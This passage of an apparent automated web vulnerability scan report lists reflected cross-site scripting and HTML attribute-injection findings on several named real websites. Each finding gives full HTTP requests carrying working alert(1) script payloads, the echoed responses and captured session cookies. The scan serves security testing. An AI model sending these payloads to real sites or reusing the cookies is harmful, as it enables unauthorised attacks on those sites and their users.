(function(){stButtons.processCBb4556;alert(1)//83e614a352a({"url":"http:\/\/www.javaworld.com\/javaworld\/jw-10-2007\/jw-10-acegi2.html","email":5,"wordpress":1,"slashdot":2,"twitter":1,"stumbleupon":1,"total":10,"ourl":"http:\/\/www.javaworld.com\/javaworld\
...[SNIP]...

1.35. http://webconnect.sendouts.com/candidate/my-profile.aspx [Group parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://webconnect.sendouts.com
Path:   /candidate/my-profile.aspx

Issue detail

The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 35f67'%20a%3db%200611e0106fd was submitted in the Group parameter. This input was echoed as 35f67' a=b 0611e0106fd in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /candidate/my-profile.aspx?ID=cfs&SiteID=WebConnect&Group=cfs35f67'%20a%3db%200611e0106fd&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:33:52 GMT
Content-Length: 6843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LogIn</title
...[SNIP]...
<link href='WebConnectCss/cfs35f67' a=b 0611e0106fd.css' type="text/css" rel="stylesheet" />
...[SNIP]...

1.36. http://webconnect.sendouts.com/forgot-login.aspx [Group parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://webconnect.sendouts.com
Path:   /forgot-login.aspx

Issue detail

The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb325'%20a%3db%208528d690379 was submitted in the Group parameter. This input was echoed as bb325' a=b 8528d690379 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /forgot-login.aspx?ID=cfs&SiteID=WebConnect&Group=cfsbb325'%20a%3db%208528d690379&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:34:07 GMT
Content-Length: 4051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<HTML>
<HEAD>
       <title>Get My Login Information</title>
       <meta name
...[SNIP]...
<LINK href='WebConnectCss/cfsbb325' a=b 8528d690379.css' type="text/css" rel="stylesheet">
...[SNIP]...

1.37. http://webconnect.sendouts.com/job-search.aspx [Group parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://webconnect.sendouts.com
Path:   /job-search.aspx

Issue detail

The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ff9f0'%20a%3db%20f4c3c17ad5d was submitted in the Group parameter. This input was echoed as ff9f0' a=b f4c3c17ad5d in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /job-search.aspx?ID=cfs&SiteID=WebConnect&Group=cfsff9f0'%20a%3db%20f4c3c17ad5d&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:33:46 GMT
Content-Length: 9877


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Search Open
...[SNIP]...
<link href='WebConnectCss/cfsff9f0' a=b f4c3c17ad5d.css' type="text/css" rel="stylesheet"/>
...[SNIP]...

1.38. http://webconnect.sendouts.com/login.aspx [Group parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://webconnect.sendouts.com
Path:   /login.aspx

Issue detail

The value of the Group request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c1431'%20a%3db%20645a5e00b99 was submitted in the Group parameter. This input was echoed as c1431' a=b 645a5e00b99 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfsc1431'%20a%3db%20645a5e00b99&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:34:17 GMT
Content-Length: 6809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LogIn</title
...[SNIP]...
<link href='WebConnectCss/cfsc1431' a=b 645a5e00b99.css' type="text/css" rel="stylesheet" />
...[SNIP]...

1.39. https://www.ca.com/us/register/login.aspx [returnURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The value of the returnURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ece79"><script>alert(1)</script>39e531be28d was submitted in the returnURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/register/login.aspx?returnURL=/us/default.aspxece79"><script>alert(1)</script>39e531be28d HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351389192:ss=1315351389192; bn_u=6923713924586392201

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:26:23 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:26:23 GMT
Content-Length: 35970


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<a href="http://www.ca.com/us/register/createprofile.aspx?returnURL=/us/default.aspxece79"><script>alert(1)</script>39e531be28d" id="hrefRegisterNow" style="background-color:#0084c9; padding:4px 4px 4px 4px; text-decoration:none;color:#FFFFFF" target="_blank">
...[SNIP]...

1.40. http://www.javalobby.org/articles/acegisecurity/part1.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.javalobby.org
Path:   /articles/acegisecurity/part1.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f89f"><script>alert(1)</script>75a3249fbe5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/acegisecurity/part1.jsp?8f89f"><script>alert(1)</script>75a3249fbe5=1 HTTP/1.1
Host: www.javalobby.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.2.1
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 06 Sep 2011 17:55:39 GMT
Content-Length: 33612


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
   <head>

       <title>Securing Your Java Applications - Acegi Security Style</title>
<meta http-equiv="content-type"
...[SNIP]...
<input type="hidden" name="successURL" id="successURL01" value="http://www.javalobby.org/articles/acegisecurity/part1.jsp?8f89f"><script>alert(1)</script>75a3249fbe5=1" />
...[SNIP]...

1.41. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [cmd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The value of the cmd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91bbd"-alert(1)-"f87f5c47280 was submitted in the cmd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC91bbd"-alert(1)-"f87f5c47280&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:52:05 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
nds(cmd){
   switch (cmd){
       case 'hilite' :
var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC91bbd"-alert(1)-"f87f5c47280&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294";
viewDocUrl = viewDocUrl.replace("&highlight=off","");
var strValue="on";

...[SNIP]...

1.42. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [dialogID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The value of the dialogID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9159"-alert(1)-"4a3c1582004 was submitted in the dialogID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985c9159"-alert(1)-"4a3c1582004&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:52:06 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
(cmd){
       case 'hilite' :
var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985c9159"-alert(1)-"4a3c1582004&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294";
viewDocUrl = viewDocUrl.replace("&highlight=off","");
var strValue="on";
str
...[SNIP]...

1.43. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The value of the docType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b2e1"-alert(1)-"87e65d4c18e was submitted in the docType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc4b2e1"-alert(1)-"87e65d4c18e&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:52:04 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...
documentCommands(cmd){
   switch (cmd){
       case 'hilite' :
var viewDocUrl = "http://www.kb.sony.com:80/selfservice/viewdocument.do?externalId=http--supportmicrosoftcom-kb-188175&docType=kc4b2e1"-alert(1)-"87e65d4c18e&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294";
viewDocUrl = viewDocUrl.replace("&highlight=off","");
var strValue="
...[SNIP]...

1.44. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Header.jsp [docTypeID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Header.jsp

Issue detail

The value of the docTypeID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9060"-alert(1)-"4496b4fc800 was submitted in the docTypeID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selfservice/common/viewdocument_forFrameset_Header.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1d9060"-alert(1)-"4496b4fc800&stateId=1+0+328800294 HTTP/1.1
Host: www.kb.sony.com
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; 